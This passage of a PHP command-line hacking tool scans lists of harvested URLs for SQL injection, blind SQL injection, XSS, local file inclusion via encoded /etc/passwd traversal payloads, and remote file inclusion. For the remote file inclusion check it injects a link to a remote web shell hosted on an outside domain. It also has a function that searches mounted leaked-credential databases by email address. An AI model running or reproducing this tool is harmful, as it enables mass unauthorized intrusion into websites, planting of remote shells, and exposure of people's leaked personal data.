if(strpos($link, '=') !== false) { 865 | $urls = array(); 866 | $params = explode("?", $link); 867 | $params = explode("&", $params[1]); 868 | foreach($params as $param) 869 | { 870 | $KeyValuePair = explode("=",$param); 871 | $urls[] .= str_replace($param, $KeyValuePair[0] . "=" . $KeyValuePair[1] . " and 1 = 1", $link); //We should add possibilitys of pre- and suffixes 872 | $urls[] .= str_replace($param, $KeyValuePair[0] . "=" . $KeyValuePair[1] . " and 1 = 2", $link); 873 | } 874 | 875 | for($i = 0; $i < count($urls); $i+=2) 876 | { 877 | $true = $urls[$i]; 878 | $false = $urls[$i+1]; 879 | 880 | if($cleanHashCode == hash_file(file_get_contents($true))) 881 | { 882 | if($cleanHashCode != hash_file(file_get_contents($false))) 883 | { 884 | $text = $urls[$i] . "\n"; 885 | $handle = fopen('out/sqli.txt', 'a+'); 886 | fwrite($handle, $text); 887 | fclose($handle); 888 | print "\033[1;37m1\033[0;37m"; 889 | } 890 | else { 891 | print '0'; 892 | } 893 | } 894 | } 895 | } 896 | } 897 | else { 898 | print '0'; 899 | } 900 | } 901 | 902 | function sqli($link) { 903 | if(strpos($link, '=') !== false) { 904 | $linki = array(); 905 | $zmienne = explode("?", $link); 906 | $zmienne2 = explode("&", $zmienne[1]); 907 | foreach($zmienne2 as $zmienna){ 908 | $rozbite = explode("=", $zmienna); 909 | $linki[] .= str_replace($rozbite[0] . "=" . $rozbite[1], $rozbite[0] . "=" . $rozbite[1] . "'", $link); 910 | 911 | } 912 | foreach($linki as $lin) { 913 | $reg = "/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error|SQL command not properly ended|Microsoft SQL Native Client error|Query failed: ERROR: syntax error/i"; 914 | if (preg_match($reg, file_get_contents($lin)) && !preg_match($reg, file_get_contents($link))) { 915 | $text = $lin . "\n"; 916 | $handle = fopen('out/sqli.txt', 'a+'); 917 | fwrite($handle, $text); 918 | fclose($handle); 919 | print "\033[1;37m1\033[0;37m"; 920 | } else { 921 | print '0'; 922 | } 923 | } 924 | } else { 925 | 926 | if(strpos($link, ".php")) { 927 | 928 | $url = $link . "'"; 929 | 930 | if(preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error|SQL command not properly ended|Microsoft SQL Native Client error|Query failed: ERROR: syntax error/i", file_get_contents($url))) { 931 | $text = $url . "\n"; 932 | $handle = fopen('out/sqli.txt', 'a+'); 933 | fwrite($handle, $text); 934 | fclose($handle); 935 | print "\033[1;37mI\033[0;37m"; 936 | } else { 937 | print "O"; 938 | } 939 | 940 | } else { 941 | print "O"; 942 | } 943 | 944 | 945 | } 946 | 947 | } 948 | 949 | function xss($link) { 950 | 951 | $all = parse_url($link); 952 | 953 | if(strpos($link, '=') !== false) { 954 | $linki = array(); 955 | $zmienne = explode("?", $link); 956 | $zmienne2 = explode("&", $zmienne[1]); 957 | foreach($zmienne2 as $zmienna){ 958 | $rozbite = explode("=", $zmienna); 959 | $linki[] .= str_replace($rozbite[0] . "=" . $rozbite[1], $rozbite[0] . "=" . urlencode("'>\">"), $link); 960 | } 961 | foreach($linki as $lin) { 962 | if (strpos(file_get_contents($lin), "")) { 963 | $text = urldecode($lin) . "\n"; 964 | $handle = fopen('out/xss.txt', 'a+'); 965 | fwrite($handle, $text); 966 | fclose($handle); 967 | print "\033[1;37m1\033[0;37m"; 968 | } else { 969 | print '0'; 970 | } 971 | } 972 | } 973 | 974 | else { 975 | 976 | $all = parse_url($link); 977 | 978 | $url = $link . "'>\">"; 979 | 980 | if(strpos(url_get_contents($url), "")) { 981 | $text = $url . "\n"; 982 | $handle = fopen('out/xss.txt', 'a+'); 983 | fwrite($handle, $text); 984 | fclose($handle); 985 | print "\033[1;37mI\033[0;37m"; 986 | } else { 987 | print 'O'; 988 | } 989 | 990 | } 991 | } 992 | 993 | 994 | function clear() { 995 | 996 | print "\n File: "; 997 | $whichf = fopen ("php://stdin","r"); 998 | $file = fgets($whichf); 999 | $file = trim($file); 1000 | if(file_exists('out/'.$file)) { 1001 | 1002 | passthru('sort out/'.$file.' | uniq >> out/clear-'.$file); 1003 | print "\nDone! Saved as clear-".$file."\n"; 1004 | 1005 | } else { 1006 | print "\nFile doesn't exist!\n"; 1007 | } 1008 | } 1009 | 1010 | function lfi($link) { 1011 | 1012 | $lfi = array( 1013 | "%2Fetc%2Fpasswd", 1014 | "..%2Fetc%2Fpasswd", 1015 | "..%2F..%2Fetc%2Fpasswd", 1016 | "..%2F..%2F..%2Fetc%2Fpasswd", 1017 | "..%2F..%2F..%2F..%2Fetc%2Fpasswd", 1018 | "..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", 1019 | "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", 1020 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", 1021 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", 1022 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", 1023 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", 1024 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", 1025 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", 1026 | "%2Fetc%2Fpasswd%00", 1027 | "..%2Fetc%2Fpasswd%00", 1028 | "..%2F..%2Fetc%2Fpasswd%00", 1029 | "..%2F..%2F..%2Fetc%2Fpasswd%00", 1030 | "..%2F..%2F..%2F..%2Fetc%2Fpasswd%00", 1031 | "..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00", 1032 | "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00", 1033 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00", 1034 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00", 1035 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00", 1036 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00", 1037 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00", 1038 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00" 1039 | ); 1040 | 1041 | 1042 | if(strpos($link, '=') !== false) { 1043 | $linki = array(); 1044 | $zmienne = explode("?", $link); 1045 | $zmienne2 = explode("&", $zmienne[1]); 1046 | foreach($zmienne2 as $zmienna){ 1047 | foreach($lfi as $vuln) { 1048 | $rozbite = explode("=", $zmienna); 1049 | $linki[] .= str_replace($rozbite[0] . "=" . $rozbite[1], $rozbite[0] . "=" . $vuln, $link); 1050 | } 1051 | foreach($linki as $lin) { 1052 | if (preg_match("/root:x:/", file_get_contents($lin))) { 1053 | $text = $lin . "\n"; 1054 | $handle = fopen('out/lfi.txt', 'a+'); 1055 | fwrite($handle, $text); 1056 | fclose($handle); 1057 | print "\033[1;37m1\033[0;37m"; 1058 | break; 1059 | } else { 1060 | print '0'; 1061 | } 1062 | } 1063 | } 1064 | } else { 1065 | print 'O'; 1066 | } 1067 | 1068 | } 1069 | 1070 | function rfi($link) { 1071 | 1072 | if(strpos($link, '=') !== false) { 1073 | $linki = array(); 1074 | $zmienne = explode("?", $link); 1075 | $zmienne2 = explode("&", $zmienne[1]); 1076 | foreach($zmienne2 as $zmienna){ 1077 | $rozbite = explode("=", $zmienna); 1078 | $linki[] .= str_replace($rozbite[0] . "=" . $rozbite[1], $rozbite[0] . "=https://devilteam.pl/hauru.txt?", $link); 1079 | } 1080 | foreach($linki as $lin) { 1081 | if (strpos(file_get_contents($lin), "Hauru Shell")) { 1082 | $text = $lin . "\n"; 1083 | $handle = fopen('out/rfi.txt', 'a+'); 1084 | fwrite($handle, $text); 1085 | fclose($handle); 1086 | print "\033[1;37m1\033[0;37m"; 1087 | } else { 1088 | print '0'; 1089 | } 1090 | } 1091 | } else { 1092 | print '0'; 1093 | } 1094 | 1095 | } 1096 | 1097 | function show() { 1098 | 1099 | print "\n File: "; 1100 | $show = fopen ("php://stdin","r"); 1101 | $sfile = fgets($show); 1102 | $sfile = trim($sfile); 1103 | 1104 | if(file_exists('out/'.$sfile)) { 1105 | 1106 | print "\n\nContent of ".$sfile.":\n"; 1107 | print file_get_contents('out/'.$sfile); 1108 | } else { 1109 | print "\nFile doesn't exist!\n"; 1110 | } 1111 | } 1112 | 1113 | function cmd() { 1114 | 1115 | print "\n Command: "; 1116 | $exec = fopen ("php://stdin","r"); 1117 | $cmd = fgets($exec); 1118 | print passthru(escapeshellcmd($cmd)); 1119 | 1120 | } 1121 | 1122 | function search() { 1123 | 1124 | $path='/path/to/databases'; 1125 | 1126 | if(file_exists($path)) { 1127 | 1128 | print "\n Mail: "; 1129 | $mail = fopen ("php://stdin","r"); 1130 | $email = fgets($mail); 1131 | $email = trim($email); 1132 | 1133 | if($email == 'showdbs') { 1134 | 1135 | print passthru('wc -l '.$path.'*'); 1136 | 1137 | } else { 1138 | 1139 | printf("\n\n"); 1140 | 1141 | if ($handle = opendir($path)) { 1142 | while (false !== ($entry = readdir($handle))) { 1143 | if ($entry != "." && $entry != "..") { 1144 | 1145 | $f=0; 1146 | 1147 | $fp = fopen($path.$entry, 'a+'); 1148 | flock($fp, 1); 1149 | while(!feof($fp)) 1150 | { 1151 | $linia = fgets($fp, 2048); 1152 | $f=$f+1; 1153 | $profunkcjaglobusa = stripos($linia, $email); 1154 | if ($profunkcjaglobusa !== false) 1155 | { 1156 | echo $linia; 1157 | echo 'Found in: ' .$entry. ', in line ' .$f; 1158 | printf("\n...\n"); 1159 | } 1160 | 1161 | } 1162 | } 1163 | } 1164 | closedir($handle); 1165 | } 1166 | } 1167 | } else { 1168 | print "\nDatabases not mounted.\n"; 1169 | } 1170 | } 1171 | 1172 | 1173 | function stats() { 1174 | 1175 | $ip = file_get_contents('http://bot.whatismyipaddress.com/'); 1176 | $geourl = "http://www.geoplugin.net/php.gp?ip=".$ip; 1177 | $geoarr = unserialize(file_get_contents($geourl)); 1178 | 1179 | $country = $geoarr['geoplugin_countryName']; 1180 | 1181 | if(!$country){ 1182 | $country = "Dunno"; 1183 | } 1184 | 1185 | print "\n\nInfo:\n"; 1186 | print " IP - ".$ip." (".$country.")\n"; 1187 | print " Time - ".date('j/y - G:i')."\n"; 1188 | print " Database's mounted: "; 1189 | if(is_dir('/path/to/databases')) { 1190 | print "Yes\n"; 1191 | } else { print "No\n"; } 1192 | 1193 | print "\nFiles:\n"; 1194 | if(!file_exists('out')) { 1195 | passthru('mkdir out'); 1196 | print "\n Output directory created."; 1197 | } elseif($handle = opendir('out')) { 1198 | $total = 0; 1199 | while (false !== ($entry = readdir($handle))) { 1200 | if ($entry != "." && $entry != "..") { 1201 | print " - ".$entry." (".count(file('out/'.$entry)).")\n"; 1202 | $total = $total + count(file('out/'.$entry)); 1203 | } 1204 | } 1205 | print "\nTotal lines - ".$total; 1206 | closedir($handle); 1207 | } else { 1208 | print "\nNo such directory."; 1209 | } 1210 | } 1211 | 1212 | function scan() { 1213 | 1214 | print "\n Options:\n"; 1215 | print " sqli - SQL Injection\n"; 1216 | print " blind_sqli - Blind SQL Injection\n"; 1217 | print " xss - Cross Site Scripting\n"; 1218 | print " lfi - Local File Inclusion\n"; 1219 | print " rfi - Remote File Inclusion\n"; 1220 | print " all - Fuck shit up\n"; 1221 | print " What: "; 1222 | 1223 | $choice = fopen ("php://stdin","r"); 1224 | $what = fgets($choice); 1225 | 1226 | 1227 | print "\n File: "; 1228 | 1229 | $choicef = fopen ("php://stdin","r"); 1230 | $whatf = fgets($choicef); 1231 | $whatf = trim($whatf); 1232 | 1233 | if(file_exists('out/'.$whatf)) { 1234 | 1235 | if(trim($what) == 'sqli' || trim($what) == 'all' || trim($what) == 'sqli&xss') { 1236 | print "\n\n - Testing SQL Injection for " .count(file('out/'.$whatf)). " parameters ($whatf)\n"; 1237 | $urls = file('out/'.$whatf); 1238 | foreach($urls as $link) { 1239 | sqli(urldecode($link)); 1240 | } 1241 | 1242 | } 1243 | 1244 | if(trim($what) == 'blind_sqli' || trim($what) == 'all' || trim($what) == 'blind_sqli&xss' || trim($what) == 'sqli&blind_sqli&xss') { 1245 | 1246 | print "\n\n - Testing Blind SQL Injection for " .count(file('out/'.$whatf)). " parameters ($whatf)\n"; 1247 | $urls = file('out/'.$whatf); 1248 | foreach($urls as $link) { 1249 | blind_sqli(urldecode($link)); 1250 | } 1251 | } 1252 | 1253 | if(trim($what) == 'xss' || trim($what) == 'all' || trim($what) == 'sqli&xss') { 1254 | print "\n\n - Testing Cross Site Scripting for " .count(file('out/'.$whatf)). " parameters ($whatf)\n"; 1255 | $urls = file('out/'.$whatf); 1256 | foreach($urls as $link) { 1257 | xss(urldecode($link)); 1258 | } 1259 | } 1260 | 1261 | if(trim($what) == 'lfi' || trim($what) == 'all' || trim($what == 'lfi&rfi')) { 1262 | print "\n\n - Testing Local File Inclusion for " .count(file('out/'.$whatf)). " parameters ($whatf)\n"; 1263 | $urls = file('out/'.$whatf); 1264 | foreach($urls as $link) { 1265 | lfi(urldecode($link)); 1266 | } 1267 | 1268 | } 1269 | 1270 | if(trim($what) == 'rfi' || trim($what) == 'all' || trim($what == 'lfi&rfi')) { 1271 | print "\n\n - Testing Remote File Inclusion for " .count(file('out/'.$whatf)). " parameters ($whatf)\n"; 1272 | $urls = file('out/'.$whatf); 1273 | foreach($urls as $link) { 1274 | rfi(urldecode($link)); 1275 | } 1276 | 1277 | } 1278 | 1279 | 1280 | } else { 1281 | print "\nFile doesnt exist!\n"; 1282 | } 1283 | } 1284 | 1285 | 1286 | 1287 | options(); 1288 | 1289 | while (1 == 1) { 1290 | 1291 | print "\n\n >> "; 1292 | $handle = fopen ("php://stdin","r"); 1293 | $line = fgets($handle); 1294 | 1295 | if(trim($line) == 'exit') { 1296 | echo "Aborting!\n"; 1297 | exit; 1298 | } 1299 | 1300 | if(trim($line) == 'help') { 1301 | options(); 1302 | } 1303 | 1304 | if(trim($line) == 'dork') { 1305 | dork(); 1306 | } 1307 | 1308 | if(trim($line) == 'cmd') { 1309 | cmd(); 1310 | } 1311 | 1312 | if(trim($line) == 'massurl') { 1313 | massurl(); 1314 | } 1315 | 1316 | if(trim($line) == 'brutefpds') { 1317 | brutefpds(); 1318 | } 1319 | 1320 | if(trim($line) == 'clear') { 1321 | clear(); 1322 | } 1323 | 1324 | if(trim($line) == 'stat') { 1325 | stats(); 1326 | } 1327 | 1328 | if(trim($line) == 'show') { 1329 | show(); 1330 | } 1331 | 1332 | if(trim($line) == 'top') { 1333 | top(); 1334 | } 1335 | 1336 | if(trim($line) == 'search') { 1337 | search(); 1338 | } 1339 | 1340 | if(trim($line) == 'multibruter') { 1341 | multibruter(); 1342 | } 1343 | 1344 | if(trim($line) == 'geturl') { 1345 | geturl(); 1346 | } 1347 | 1348 | if(trim($line) == 'filter') { 1349 | filter(); 1350 | } 1351 | 1352 | if(trim($line) == 'scan') { 1353 | scan(); 1354 | } 1355 | 1356 | if(trim($line) == 'fpds') { 1357 | fpds(); 1358 | } 1359 | 1360 | 1361 | } 1362 | 1363 | ?> 1364 | --------------------------------------------------------------------------------